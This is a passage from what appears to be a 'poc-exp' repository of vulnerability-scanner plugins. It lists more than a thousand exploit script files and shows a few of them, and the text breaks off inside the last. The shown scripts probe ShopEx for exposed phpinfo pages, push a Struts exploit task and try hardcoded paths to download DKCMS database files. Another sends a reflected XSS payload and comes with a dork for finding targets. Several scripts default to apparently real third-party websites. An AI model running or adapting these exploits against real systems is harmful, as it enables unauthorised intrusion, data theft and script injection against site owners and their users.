├── DNS.py ├── README.md ├── bugscan_exec.py ├── exp_list ├── decode.py ├── exp-103.py ├── exp-104.py ├── exp-1046.py ├── exp-105.py ├── exp-1050.py ├── exp-1051.py ├── exp-1052.py ├── exp-1058.py ├── exp-106.py ├── exp-1060.py ├── exp-1061.py ├── exp-1063.py ├── exp-1067.py ├── exp-1068.py ├── exp-1069.py ├── exp-107.py ├── exp-1072.py ├── exp-1073.py ├── exp-1074.py ├── exp-1076.py ├── exp-108.py ├── exp-1082.py ├── exp-1083.py ├── exp-1102.py ├── exp-1103.py ├── exp-1104.py ├── exp-1105.py ├── exp-1107.py ├── exp-1108.py ├── exp-1109.py ├── exp-1111.py ├── exp-1113.py ├── exp-1114.py ├── exp-1118.py ├── exp-1119.py ├── exp-1121.py ├── exp-1122.py ├── exp-1123.py ├── exp-1124.py ├── exp-1125.py ├── exp-1126.py ├── exp-1127.py ├── exp-113.py ├── exp-1130.py ├── exp-1132.py ├── exp-1136.py ├── exp-1138.py ├── exp-1139.py ├── exp-1140.py ├── exp-1141.py ├── exp-1143.py ├── exp-1144.py ├── exp-1146.py ├── exp-1148.py ├── exp-1149.py ├── exp-1150.py ├── exp-1151.py ├── exp-1152.py ├── exp-1153.py ├── exp-1160.py ├── exp-1161.py ├── exp-1162.py ├── exp-1164.py ├── exp-1165.py ├── exp-1168.py ├── exp-1169.py ├── exp-1170.py ├── exp-1171.py ├── exp-1172.py ├── exp-1176.py ├── exp-1177.py ├── exp-1179.py ├── exp-118.py ├── exp-1182.py ├── exp-1183.py ├── exp-1185.py ├── exp-1186.py ├── exp-1189.py ├── exp-1190.py ├── exp-1192.py ├── exp-1193.py ├── exp-1194.py ├── exp-1195.py ├── exp-1199.py ├── exp-120.py ├── exp-1200.py ├── exp-1201.py ├── exp-1202.py ├── exp-1203.py ├── exp-1204.py ├── exp-1218.py ├── exp-1219.py ├── exp-1223.py ├── exp-1224.py ├── exp-1225.py ├── exp-1226.py ├── exp-1227.py ├── exp-1228.py ├── exp-1230.py ├── exp-1231.py ├── exp-1232.py ├── exp-1233.py ├── exp-1235.py ├── exp-1236.py ├── exp-1237.py ├── exp-1238.py ├── exp-1252.py ├── exp-1253.py ├── exp-1254.py ├── exp-1255.py ├── exp-1257.py ├── exp-1258.py ├── exp-1260.py ├── exp-1262.py ├── exp-1263.py ├── exp-1264.py ├── exp-1267.py ├── exp-1268.py ├── exp-127.py ├── exp-1271.py ├── exp-1272.py ├── exp-1273.py ├── exp-1274.py ├── exp-1275.py ├── exp-1276.py ├── exp-1277.py ├── exp-1278.py ├── exp-1279.py ├── exp-128.py ├── exp-1280.py ├── exp-1283.py ├── exp-1284.py ├── exp-1285.py ├── exp-1286.py ├── exp-1288.py ├── exp-1289.py ├── exp-129.py ├── exp-1290.py ├── exp-1292.py ├── exp-130.py ├── exp-1300.py ├── exp-1303.py ├── exp-1304.py ├── exp-131.py ├── exp-1323.py ├── exp-1328.py ├── exp-133.py ├── exp-1332.py ├── exp-1335.py ├── exp-1336.py ├── exp-1339.py ├── exp-134.py ├── exp-1340.py ├── exp-1341.py ├── exp-1344.py ├── exp-1349.py ├── exp-1351.py ├── exp-1352.py ├── exp-1354.py ├── exp-1356.py ├── exp-1358.py ├── exp-1359.py ├── exp-1363.py ├── exp-1364.py ├── exp-1365.py ├── exp-1368.py ├── exp-1376.py ├── exp-138.py ├── exp-139.py ├── exp-1393.py ├── exp-140.py ├── exp-1406.py ├── exp-1408.py ├── exp-141.py ├── exp-1412.py ├── exp-1417.py ├── exp-1418.py ├── exp-1419.py ├── exp-142.py ├── exp-1422.py ├── exp-1424.py ├── exp-143.py ├── exp-1435.py ├── exp-1437.py ├── exp-1438.py ├── exp-144.py ├── exp-1441.py ├── exp-1442.py ├── exp-1447.py ├── exp-1448.py ├── exp-1449.py ├── exp-1454.py ├── exp-1457.py ├── exp-1461.py ├── exp-1463.py ├── exp-1466.py ├── exp-147.py ├── exp-1470.py ├── exp-1473.py ├── exp-1475.py ├── exp-1476.py ├── exp-1479.py ├── exp-1481.py ├── exp-1483.py ├── exp-1484.py ├── exp-1485.py ├── exp-1489.py ├── exp-1490.py ├── exp-1492.py ├── exp-1494.py ├── exp-1497.py ├── exp-1502.py ├── exp-1503.py ├── exp-1507.py ├── exp-152.py ├── exp-1521.py ├── exp-1525.py ├── exp-1526.py ├── exp-1530.py ├── exp-1545.py ├── exp-155.py ├── exp-1553.py ├── exp-1556.py ├── exp-1559.py ├── exp-156.py ├── exp-1561.py ├── exp-157.py ├── exp-158.py ├── exp-1582.py ├── exp-159.py ├── exp-1592.py ├── exp-1595.py ├── exp-1597.py ├── exp-160.py ├── exp-1604.py ├── exp-1606.py ├── exp-161.py ├── exp-1616.py ├── exp-162.py ├── exp-1626.py ├── exp-1628.py ├── exp-1629.py ├── exp-163.py ├── exp-1633.py ├── exp-1634.py ├── exp-1635.py ├── exp-1637.py ├── exp-1639.py ├── exp-164.py ├── exp-1644.py ├── exp-1645.py ├── exp-1646.py ├── exp-1647.py ├── exp-1655.py ├── exp-1656.py ├── exp-1657.py ├── exp-166.py ├── exp-1662.py ├── exp-1664.py ├── exp-1666.py ├── exp-1667.py ├── exp-1668.py ├── exp-167.py ├── exp-1670.py ├── exp-1671.py ├── exp-1672.py ├── exp-1674.py ├── exp-1675.py ├── exp-1676.py ├── exp-1677.py ├── exp-168.py ├── exp-1680.py ├── exp-1681.py ├── exp-1687.py ├── exp-169.py ├── exp-1690.py ├── exp-1692.py ├── exp-1693.py ├── exp-1697.py ├── exp-170.py ├── exp-1702.py ├── exp-1704.py ├── exp-1706.py ├── exp-1707.py ├── exp-1709.py ├── exp-171.py ├── exp-1710.py ├── exp-1713.py ├── exp-1715.py ├── exp-1717.py ├── exp-1718.py ├── exp-172.py ├── exp-1721.py ├── exp-1723.py ├── exp-1725.py ├── exp-1739.py ├── exp-174.py ├── exp-1740.py ├── exp-1741.py ├── exp-1742.py ├── exp-1744.py ├── exp-1746.py ├── exp-1748.py ├── exp-1749.py ├── exp-175.py ├── exp-1750.py ├── exp-1753.py ├── exp-1754.py ├── exp-1755.py ├── exp-1757.py ├── exp-176.py ├── exp-1769.py ├── exp-177.py ├── exp-1770.py ├── exp-1773.py ├── exp-1774.py ├── exp-1775.py ├── exp-1776.py ├── exp-1777.py ├── exp-1778.py ├── exp-1779.py ├── exp-1780.py ├── exp-1781.py ├── exp-1783.py ├── exp-1784.py ├── exp-1785.py ├── exp-1788.py ├── exp-179.py ├── exp-1791.py ├── exp-1792.py ├── exp-1793.py ├── exp-1796.py ├── exp-1797.py ├── exp-1798.py ├── exp-1799.py ├── exp-1801.py ├── exp-1805.py ├── exp-1806.py ├── exp-1807.py ├── exp-181.py ├── exp-1810.py ├── exp-1814.py ├── exp-1815.py ├── exp-1816.py ├── exp-1817.py ├── exp-1818.py ├── exp-1819.py ├── exp-182.py ├── exp-1821.py ├── exp-1822.py ├── exp-1823.py ├── exp-1824.py ├── exp-1826.py ├── exp-1827.py ├── exp-1828.py ├── exp-1829.py ├── exp-1831.py ├── exp-1832.py ├── exp-1833.py ├── exp-1834.py ├── exp-1835.py ├── exp-1836.py ├── exp-1837.py ├── exp-1838.py ├── exp-184.py ├── exp-1846.py ├── exp-1847.py ├── exp-1848.py ├── exp-1849.py ├── exp-1852.py ├── exp-1853.py ├── exp-1861.py ├── exp-1862.py ├── exp-1863.py ├── exp-1864.py ├── exp-1865.py ├── exp-1866.py ├── exp-1868.py ├── exp-1871.py ├── exp-1872.py ├── exp-1874.py ├── exp-1875.py ├── exp-1879.py ├── exp-1880.py ├── exp-1881.py ├── exp-1885.py ├── exp-1888.py ├── exp-1889.py ├── exp-1891.py ├── exp-1894.py ├── exp-1896.py ├── exp-1897.py ├── exp-1898.py ├── exp-1901.py ├── exp-1902.py ├── exp-1903.py ├── exp-1906.py ├── exp-1909.py ├── exp-1910.py ├── exp-1912.py ├── exp-1913.py ├── exp-1914.py ├── exp-1915.py ├── exp-1917.py ├── exp-1918.py ├── exp-1919.py ├── exp-1920.py ├── exp-1921.py ├── exp-1922.py ├── exp-1924.py ├── exp-1925.py ├── exp-1926.py ├── exp-1927.py ├── exp-1928.py ├── exp-193.py ├── exp-1930.py ├── exp-1933.py ├── exp-1934.py ├── exp-1936.py ├── exp-1937.py ├── exp-1939.py ├── exp-1941.py ├── exp-1942.py ├── exp-1943.py ├── exp-1944.py ├── exp-1945.py ├── exp-1946.py ├── exp-1947.py ├── exp-1948.py ├── exp-195.py ├── exp-1950.py ├── exp-1951.py ├── exp-1952.py ├── exp-1953.py ├── exp-1954.py ├── exp-1956.py ├── exp-1957.py ├── exp-1959.py ├── exp-1961.py ├── exp-1962.py ├── exp-1963.py ├── exp-1965.py ├── exp-1966.py ├── exp-1967.py ├── exp-1968.py ├── exp-1969.py ├── exp-1970.py ├── exp-1974.py ├── exp-1977.py ├── exp-1978.py ├── exp-1979.py ├── exp-1981.py ├── exp-1982.py ├── exp-1984.py ├── exp-1985.py ├── exp-1986.py ├── exp-1987.py ├── exp-1988.py ├── exp-1989.py ├── exp-1990.py ├── exp-1993.py ├── exp-1996.py ├── exp-1997.py ├── exp-1998.py ├── exp-1999.py ├── exp-200.py ├── exp-2000.py ├── exp-2001.py ├── exp-2002.py ├── exp-2003.py ├── exp-2004.py ├── exp-2005.py ├── exp-2007.py ├── exp-2008.py ├── exp-2009.py ├── exp-2010.py ├── exp-2011.py ├── exp-2016.py ├── exp-2019.py ├── exp-202.py ├── exp-2020.py ├── exp-2021.py ├── exp-2022.py ├── exp-2024.py ├── exp-2025.py ├── exp-2026.py ├── exp-2029.py ├── exp-2031.py ├── exp-2032.py ├── exp-2033.py ├── exp-2034.py ├── exp-2035.py ├── exp-2038.py ├── exp-204.py ├── exp-2041.py ├── exp-2042.py ├── exp-2043.py ├── exp-2044.py ├── exp-2047.py ├── exp-2049.py ├── exp-205.py ├── exp-2050.py ├── exp-2051.py ├── exp-2052.py ├── exp-2054.py ├── exp-2069.py ├── exp-2070.py ├── exp-2071.py ├── exp-2074.py ├── exp-2075.py ├── exp-2077.py ├── exp-2079.py ├── exp-208.py ├── exp-2080.py ├── exp-2084.py ├── exp-2089.py ├── exp-2091.py ├── exp-2092.py ├── exp-2094.py ├── exp-2097.py ├── exp-2098.py ├── exp-2099.py ├── exp-2100.py ├── exp-2101.py ├── exp-2104.py ├── exp-2105.py ├── exp-2106.py ├── exp-2107.py ├── exp-2108.py ├── exp-2109.py ├── exp-2114.py ├── exp-2115.py ├── exp-2116.py ├── exp-2117.py ├── exp-2119.py ├── exp-2130.py ├── exp-2132.py ├── exp-2134.py ├── exp-2136.py ├── exp-2138.py ├── exp-2139.py ├── exp-2140.py ├── exp-2143.py ├── exp-2144.py ├── exp-2146.py ├── exp-2149.py ├── exp-2151.py ├── exp-2153.py ├── exp-2155.py ├── exp-2158.py ├── exp-2159.py ├── exp-2160.py ├── exp-2161.py ├── exp-2162.py ├── exp-2163.py ├── exp-2164.py ├── exp-2166.py ├── exp-2170.py ├── exp-2171.py ├── exp-2173.py ├── exp-2174.py ├── exp-2178.py ├── exp-2183.py ├── exp-2184.py ├── exp-2185.py ├── exp-2188.py ├── exp-2189.py ├── exp-219.py ├── exp-2193.py ├── exp-2194.py ├── exp-2195.py ├── exp-2196.py ├── exp-2197.py ├── exp-2198.py ├── exp-220.py ├── exp-2201.py ├── exp-2202.py ├── exp-2203.py ├── exp-2204.py ├── exp-2205.py ├── exp-2206.py ├── exp-2210.py ├── exp-2212.py ├── exp-2215.py ├── exp-2216.py ├── exp-2219.py ├── exp-2220.py ├── exp-2228.py ├── exp-2229.py ├── exp-2230.py ├── exp-2231.py ├── exp-2232.py ├── exp-2234.py ├── exp-2236.py ├── exp-2237.py ├── exp-2238.py ├── exp-2241.py ├── exp-2242.py ├── exp-2243.py ├── exp-2244.py ├── exp-2245.py ├── exp-2248.py ├── exp-2250.py ├── exp-2251.py ├── exp-2252.py ├── exp-2253.py ├── exp-2262.py ├── exp-2269.py ├── exp-2272.py ├── exp-2274.py ├── exp-2282.py ├── exp-2283.py ├── exp-2284.py ├── exp-2285.py ├── exp-2286.py ├── exp-2287.py ├── exp-2288.py ├── exp-2289.py ├── exp-2291.py ├── exp-2294.py ├── exp-2295.py ├── exp-2296.py ├── exp-2297.py ├── exp-2298.py ├── exp-2299.py ├── exp-2301.py ├── exp-2302.py ├── exp-2303.py ├── exp-2305.py ├── exp-2306.py ├── exp-2307.py ├── exp-2308.py ├── exp-2309.py ├── exp-2310.py ├── exp-2311.py ├── exp-2312.py ├── exp-2313.py ├── exp-2314.py ├── exp-2315.py ├── exp-2316.py ├── exp-2317.py ├── exp-2318.py ├── exp-2320.py ├── exp-2321.py ├── exp-2322.py ├── exp-2337.py ├── exp-2338.py ├── exp-2339.py ├── exp-234.py ├── exp-2340.py ├── exp-2341.py ├── exp-2342.py ├── exp-2343.py ├── exp-2345.py ├── exp-2346.py ├── exp-2347.py ├── exp-2348.py ├── exp-2350.py ├── exp-2351.py ├── exp-2353.py ├── exp-2354.py ├── exp-2355.py ├── exp-2357.py ├── exp-236.py ├── exp-2361.py ├── exp-2362.py ├── exp-2363.py ├── exp-2365.py ├── exp-2366.py ├── exp-2367.py ├── exp-2369.py ├── exp-237.py ├── exp-2370.py ├── exp-2371.py ├── exp-2372.py ├── exp-2373.py ├── exp-2374.py ├── exp-2375.py ├── exp-2376.py ├── exp-2377.py ├── exp-2378.py ├── exp-2379.py ├── exp-238.py ├── exp-2380.py ├── exp-2381.py ├── exp-2382.py ├── exp-2383.py ├── exp-2384.py ├── exp-2385.py ├── exp-2386.py ├── exp-2387.py ├── exp-2388.py ├── exp-2390.py ├── exp-2391.py ├── exp-2392.py ├── exp-2393.py ├── exp-2394.py ├── exp-2395.py ├── exp-240.py ├── exp-2403.py ├── exp-2405.py ├── exp-2406.py ├── exp-2408.py ├── exp-241.py ├── exp-2419.py ├── exp-2420.py ├── exp-2421.py ├── exp-2422.py ├── exp-2423.py ├── exp-2424.py ├── exp-2425.py ├── exp-2426.py ├── exp-2431.py ├── exp-2439.py ├── exp-2441.py ├── exp-2442.py ├── exp-2443.py ├── exp-2446.py ├── exp-2453.py ├── exp-2455.py ├── exp-2456.py ├── exp-2457.py ├── exp-2458.py ├── exp-2459.py ├── exp-246.py ├── exp-2462.py ├── exp-2467.py ├── exp-2469.py ├── exp-2471.py ├── exp-2473.py ├── exp-2474.py ├── exp-2477.py ├── exp-2478.py ├── exp-2482.py ├── exp-2488.py ├── exp-2492.py ├── exp-2493.py ├── exp-2494.py ├── exp-2495.py ├── exp-2496.py ├── exp-2498.py ├── exp-2499.py ├── exp-250.py ├── exp-2500.py ├── exp-2502.py ├── exp-2506.py ├── exp-251.py ├── exp-2517.py ├── exp-2518.py ├── exp-2522.py ├── exp-2528.py ├── exp-2529.py ├── exp-253.py ├── exp-2534.py ├── exp-2539.py ├── exp-254.py ├── exp-2542.py ├── exp-2544.py ├── exp-2547.py ├── exp-2548.py ├── exp-2549.py ├── exp-255.py ├── exp-2550.py ├── exp-2551.py ├── exp-2552.py ├── exp-2553.py ├── exp-2554.py ├── exp-2555.py ├── exp-2556.py ├── exp-2557.py ├── exp-2559.py ├── exp-2562.py ├── exp-2563.py ├── exp-2564.py ├── exp-2565.py ├── exp-2566.py ├── exp-2567.py ├── exp-2568.py ├── exp-2570.py ├── exp-2571.py ├── exp-2572.py ├── exp-2575.py ├── exp-2576.py ├── exp-2578.py ├── exp-2580.py ├── exp-2581.py ├── exp-2583.py ├── exp-2586.py ├── exp-2588.py ├── exp-2589.py ├── exp-2590.py ├── exp-2591.py ├── exp-2592.py ├── exp-2593.py ├── exp-2594.py ├── exp-2595.py ├── exp-2597.py ├── exp-2598.py ├── exp-2599.py ├── exp-2603.py ├── exp-2604.py ├── exp-2605.py ├── exp-2606.py ├── exp-2607.py ├── exp-2609.py ├── exp-261.py ├── exp-2610.py ├── exp-2611.py ├── exp-2612.py ├── exp-2613.py ├── exp-2614.py ├── exp-2616.py ├── exp-2617.py ├── exp-2618.py ├── exp-2619.py ├── exp-2620.py ├── exp-2621.py ├── exp-2622.py ├── exp-2623.py ├── exp-2624.py ├── exp-2625.py ├── exp-2627.py ├── exp-2628.py ├── exp-2629.py ├── exp-263.py ├── exp-2631.py ├── exp-2632.py ├── exp-2633.py ├── exp-2634.py ├── exp-2635.py ├── exp-2636.py ├── exp-2639.py ├── exp-2640.py ├── exp-2641.py ├── exp-2642.py ├── exp-2643.py ├── exp-2645.py ├── exp-2647.py ├── exp-2648.py ├── exp-2650.py ├── exp-2654.py ├── exp-2655.py ├── exp-2656.py ├── exp-2658.py ├── exp-2659.py ├── exp-266.py ├── exp-2660.py ├── exp-2661.py ├── exp-2663.py ├── exp-2667.py ├── exp-2668.py ├── exp-267.py ├── exp-2670.py ├── exp-2671.py ├── exp-2672.py ├── exp-2673.py ├── exp-2675.py ├── exp-2676.py ├── exp-2678.py ├── exp-2679.py ├── exp-2681.py ├── exp-2682.py ├── exp-2683.py ├── exp-2684.py ├── exp-2685.py ├── exp-2686.py ├── exp-2687.py ├── exp-2688.py ├── exp-2689.py ├── exp-2690.py ├── exp-2691.py ├── exp-2692.py ├── exp-2693.py ├── exp-2696.py ├── exp-2697.py ├── exp-2699.py ├── exp-2700.py ├── exp-2701.py ├── exp-2702.py ├── exp-2703.py ├── exp-2705.py ├── exp-2706.py ├── exp-2707.py ├── exp-2708.py ├── exp-2709.py ├── exp-2710.py ├── exp-2711.py ├── exp-2712.py ├── exp-2713.py ├── exp-2714.py ├── exp-2715.py ├── exp-2716.py ├── exp-2717.py ├── exp-2718.py ├── exp-2719.py ├── exp-2720.py ├── exp-2722.py ├── exp-2723.py ├── exp-2724.py ├── exp-2726.py ├── exp-2727.py ├── exp-2729.py ├── exp-2730.py ├── exp-2731.py ├── exp-2732.py ├── exp-2733.py ├── exp-2734.py ├── exp-2735.py ├── exp-2737.py ├── exp-2738.py ├── exp-2739.py ├── exp-274.py ├── exp-2740.py ├── exp-2741.py ├── exp-2742.py ├── exp-2744.py ├── exp-2745.py ├── exp-2746.py ├── exp-2748.py ├── exp-2751.py ├── exp-2752.py ├── exp-2753.py ├── exp-2760.py ├── exp-2762.py ├── exp-2763.py ├── exp-2764.py ├── exp-2765.py ├── exp-2766.py ├── exp-2767.py ├── exp-2768.py ├── exp-2770.py ├── exp-2771.py ├── exp-2775.py ├── exp-2776.py ├── exp-2777.py ├── exp-2778.py ├── exp-278.py ├── exp-2780.py ├── exp-2781.py ├── exp-2782.py ├── exp-2783.py ├── exp-2784.py ├── exp-2787.py ├── exp-2788.py ├── exp-2794.py ├── exp-2798.py ├── exp-2799.py ├── exp-2801.py ├── exp-2802.py ├── exp-2803.py ├── exp-2809.py ├── exp-2820.py ├── exp-2821.py ├── exp-284.py ├── exp-285.py ├── exp-287.py ├── exp-289.py ├── exp-290.py ├── exp-291.py ├── exp-293.py ├── exp-294.py ├── exp-297.py ├── exp-298.py ├── exp-299.py ├── exp-302.py ├── exp-303.py ├── exp-304.py ├── exp-307.py ├── exp-314.py ├── exp-315.py ├── exp-317.py ├── exp-319.py ├── exp-321.py ├── exp-324.py ├── exp-333.py ├── exp-337.py ├── exp-342.py ├── exp-343.py ├── exp-344.py ├── exp-345.py ├── exp-346.py ├── exp-347.py ├── exp-349.py ├── exp-351.py ├── exp-356.py ├── exp-361.py ├── exp-363.py ├── exp-373.py ├── exp-374.py ├── exp-376.py ├── exp-377.py ├── exp-379.py ├── exp-383.py ├── exp-384.py ├── exp-385.py ├── exp-386.py ├── exp-387.py ├── exp-388.py ├── exp-389.py ├── exp-390.py ├── exp-391.py ├── exp-392.py ├── exp-394.py ├── exp-395.py ├── exp-397.py ├── exp-398.py ├── exp-4.py ├── exp-401.py ├── exp-407.py ├── exp-408.py ├── exp-41.py ├── exp-411.py ├── exp-412.py ├── exp-414.py ├── exp-417.py ├── exp-418.py ├── exp-419.py ├── exp-420.py ├── exp-421.py ├── exp-422.py ├── exp-427.py ├── exp-428.py ├── exp-431.py ├── exp-432.py ├── exp-433.py ├── exp-434.py ├── exp-436.py ├── exp-439.py ├── exp-440.py ├── exp-442.py ├── exp-443.py ├── exp-445.py ├── exp-448.py ├── exp-449.py ├── exp-450.py ├── exp-456.py ├── exp-465.py ├── exp-466.py ├── exp-467.py ├── exp-469.py ├── exp-47.py ├── exp-470.py ├── exp-471.py ├── exp-473.py ├── exp-474.py ├── exp-475.py ├── exp-478.py ├── exp-479.py ├── exp-480.py ├── exp-481.py ├── exp-482.py ├── exp-483.py ├── exp-484.py ├── exp-485.py ├── exp-486.py ├── exp-488.py ├── exp-489.py ├── exp-490.py ├── exp-491.py ├── exp-495.py ├── exp-501.py ├── exp-502.py ├── exp-509.py ├── exp-510.py ├── exp-511.py ├── exp-512.py ├── exp-52.py ├── exp-521.py ├── exp-528.py ├── exp-529.py ├── exp-53.py ├── exp-530.py ├── exp-543.py ├── exp-546.py ├── exp-554.py ├── exp-555.py ├── exp-557.py ├── exp-558.py ├── exp-559.py ├── exp-56.py ├── exp-560.py ├── exp-561.py ├── exp-562.py ├── exp-564.py ├── exp-570.py ├── exp-572.py ├── exp-574.py ├── exp-576.py ├── exp-580.py ├── exp-586.py ├── exp-588.py ├── exp-590.py ├── exp-592.py ├── exp-593.py ├── exp-594.py ├── exp-595.py ├── exp-596.py ├── exp-600.py ├── exp-602.py ├── exp-606.py ├── exp-607.py ├── exp-609.py ├── exp-612.py ├── exp-613.py ├── exp-616.py ├── exp-617.py ├── exp-619.py ├── exp-622.py ├── exp-623.py ├── exp-624.py ├── exp-631.py ├── exp-640.py ├── exp-657.py ├── exp-67.py ├── exp-679.py ├── exp-68.py ├── exp-682.py ├── exp-683.py ├── exp-685.py ├── exp-687.py ├── exp-688.py ├── exp-689.py ├── exp-69.py ├── exp-690.py ├── exp-695.py ├── exp-697.py ├── exp-701.py ├── exp-702.py ├── exp-727.py ├── exp-732.py ├── exp-733.py ├── exp-739.py ├── exp-740.py ├── exp-744.py ├── exp-745.py ├── exp-746.py ├── exp-747.py ├── exp-748.py ├── exp-749.py ├── exp-750.py ├── exp-753.py ├── exp-755.py ├── exp-756.py ├── exp-758.py ├── exp-759.py ├── exp-761.py ├── exp-773.py ├── exp-777.py ├── exp-779.py ├── exp-78.py ├── exp-785.py ├── exp-788.py ├── exp-790.py ├── exp-793.py ├── exp-80.py ├── exp-802.py ├── exp-803.py ├── exp-804.py ├── exp-806.py ├── exp-807.py ├── exp-808.py ├── exp-81.py ├── exp-815.py ├── exp-817.py ├── exp-821.py ├── exp-823.py ├── exp-826.py ├── exp-827.py ├── exp-828.py ├── exp-830.py ├── exp-831.py ├── exp-832.py ├── exp-834.py ├── exp-837.py ├── exp-838.py ├── exp-839.py ├── exp-840.py ├── exp-841.py ├── exp-842.py ├── exp-843.py ├── exp-847.py ├── exp-848.py ├── exp-849.py ├── exp-850.py ├── exp-851.py ├── exp-852.py ├── exp-853.py ├── exp-854.py ├── exp-856.py ├── exp-858.py ├── exp-860.py ├── exp-861.py ├── exp-862.py ├── exp-864.py ├── exp-865.py ├── exp-867.py ├── exp-868.py ├── exp-869.py ├── exp-875.py ├── exp-876.py ├── exp-877.py ├── exp-878.py ├── exp-885.py ├── exp-887.py ├── exp-889.py ├── exp-890.py ├── exp-893.py ├── exp-895.py ├── exp-899.py ├── exp-901.py ├── exp-929.py ├── exp-930.py ├── exp-931.py ├── exp-946.py ├── exp-948.py ├── exp-951.py ├── exp-954.py ├── exp-955.py ├── exp-956.py ├── exp-957.py ├── exp-97.py ├── exp-99.py ├── exp-back_100.pyc_dis.py ├── exp-back_101.pyc_dis.py ├── exp-back_102.pyc_dis.py ├── exp-back_1054.pyc_dis.py ├── exp-back_1055.pyc_dis.py ├── exp-back_1056.pyc_dis.py ├── exp-back_1062.pyc_dis.py ├── exp-back_1070.pyc_dis.py ├── exp-back_1071.pyc_dis.py ├── exp-back_11.pyc_dis.py ├── exp-back_12.pyc_dis.py ├── exp-back_13.pyc_dis.py ├── exp-back_15.pyc_dis.py ├── exp-back_16.pyc_dis.py ├── exp-back_17.pyc_dis.py ├── exp-back_1745.pyc_dis.py ├── exp-back_1756.pyc_dis.py ├── exp-back_1766.pyc_dis.py ├── exp-back_1782.pyc_dis.py ├── exp-back_1786.pyc_dis.py ├── exp-back_18.pyc_dis.py ├── exp-back_189.pyc_dis.py ├── exp-back_19.pyc_dis.py ├── exp-back_1994.pyc_dis.py ├── exp-back_1995.pyc_dis.py ├── exp-back_20.pyc_dis.py ├── exp-back_2065.pyc_dis.py ├── exp-back_2066.pyc_dis.py ├── exp-back_2067.pyc_dis.py ├── exp-back_2078.pyc_dis.py ├── exp-back_2083.pyc_dis.py ├── exp-back_2110.pyc_dis.py ├── exp-back_2112.pyc_dis.py ├── exp-back_22.pyc_dis.py ├── exp-back_23.pyc_dis.py ├── exp-back_24.pyc_dis.py ├── exp-back_25.pyc_dis.py ├── exp-back_26.pyc_dis.py ├── exp-back_27.pyc_dis.py ├── exp-back_28.pyc_dis.py ├── exp-back_29.pyc_dis.py ├── exp-back_30.pyc_dis.py ├── exp-back_33.pyc_dis.py ├── exp-back_34.pyc_dis.py ├── exp-back_35.pyc_dis.py ├── exp-back_36.pyc_dis.py ├── exp-back_37.pyc_dis.py ├── exp-back_38.pyc_dis.py ├── exp-back_39.pyc_dis.py ├── exp-back_45.pyc_dis.py ├── exp-back_46.pyc_dis.py ├── exp-back_54.pyc_dis.py ├── exp-back_57.pyc_dis.py ├── exp-back_58.pyc_dis.py ├── exp-back_59.pyc_dis.py ├── exp-back_6.pyc_dis.py ├── exp-back_60.pyc_dis.py ├── exp-back_61.pyc_dis.py ├── exp-back_62.pyc_dis.py ├── exp-back_63.pyc_dis.py ├── exp-back_64.pyc_dis.py ├── exp-back_641.pyc_dis.py ├── exp-back_65.pyc_dis.py ├── exp-back_7.pyc_dis.py ├── exp-back_70.pyc_dis.py ├── exp-back_71.pyc_dis.py ├── exp-back_72.pyc_dis.py ├── exp-back_73.pyc_dis.py ├── exp-back_74.pyc_dis.py ├── exp-back_75.pyc_dis.py ├── exp-back_76.pyc_dis.py ├── exp-back_77.pyc_dis.py ├── exp-back_8.pyc_dis.py ├── exp-back_811.pyc_dis.py ├── exp-back_82.pyc_dis.py ├── exp-back_83.pyc_dis.py ├── exp-back_84.pyc_dis.py ├── exp-back_85.pyc_dis.py ├── exp-back_86.pyc_dis.py ├── exp-back_87.pyc_dis.py ├── exp-back_88.pyc_dis.py ├── exp-back_89.pyc_dis.py ├── exp-back_9.pyc_dis.py ├── exp-back_953.pyc_dis.py ├── exp-back_98.pyc_dis.py └── info.txt ├── miniCurl.py └── threadpool.py /README.md: -------------------------------------------------------------------------------- 1 | # poc-exp 2 | -------------------------------------------------------------------------------- /exp_list/exp-103.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- coding: utf-8 -*- 3 | 4 | def assign(service, arg): 5 | if service == "shopex": 6 | return True, arg 7 | 8 | def audit(arg): 9 | for d in ['app/dev/', 'install/']: 10 | url = arg + d + 'svinfo.php?phpinfo=true' 11 | _, _, res, _, _ = curl.curl(url) 12 | if res and res.find('phpinfo()') != -1: 13 | security_info(url) 14 | break 15 | 16 | 17 | if __name__ == '__main__': 18 | from dummy import * 19 | audit(assign('shopex', 'http://www.finialshop.com/')[1]) 20 | -------------------------------------------------------------------------------- /exp_list/exp-1046.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | #-*- encoding:utf-8 -*- 3 | #ref http://wooyun.org/bugs/wooyun-2015-0104880 4 | 5 | import urlparse 6 | def assign(service, arg): 7 | if service == 'www': 8 | arr = urlparse.urlparse(arg) 9 | return True, '%s://%s/website-rank/getVoteRecordByManuscriptId.action' % (arr.scheme, arr.netloc) 10 | 11 | def audit(arg): 12 | task_push('struts',arg) 13 | 14 | 15 | if __name__ == '__main__': 16 | from dummy import * 17 | audit(assign('www', 'http://www.example.com:88/')[1]) -------------------------------------------------------------------------------- /exp_list/exp-105.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- coding: utf-8 -*- 3 | #__author__ = 'Ario' 4 | 5 | def assign(service, arg): 6 | if service == "dkcms": 7 | return True, arg 8 | 9 | def audit(arg): 10 | url = arg 11 | for db in ['data/dkcm_ssdfhwejkfs.mdb', '_data/___dkcms_30_free.mdb', '_data/I^(()UU()H.mdb']: 12 | code, head, _, _, _ = curl.curl('-I ' + url + db) 13 | if code == 200 and head.find('application/x-msaccess') != -1: 14 | security_hole(url + db) 15 | break 16 | 17 | if __name__ == '__main__': 18 | from dummy import * 19 | audit(assign('dkcms', 'http://www.gxltgroup.com/')[1]) 20 | 21 | -------------------------------------------------------------------------------- /exp_list/exp-1060.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | #Author:Little Nine 3 | #BaiduHacking: inurl:ACTIONLOGON.APPPROCESS 4 | #DaLianQianhao XSS 5 | import re 6 | 7 | def assign(service, arg): 8 | if service == "dalianqianhao": 9 | return True, arg 10 | 11 | def audit(arg): 12 | url = arg 13 | payload=url+'ACTIONLOGON.APPPROCESS?mode=1&applicant=%22%3E%3Ch1%3EYourXSShere%3C/h1%3E' 14 | code, head, res, errcode, _ = curl.curl(payload) 15 | if code == 200 and "

YourXSShere

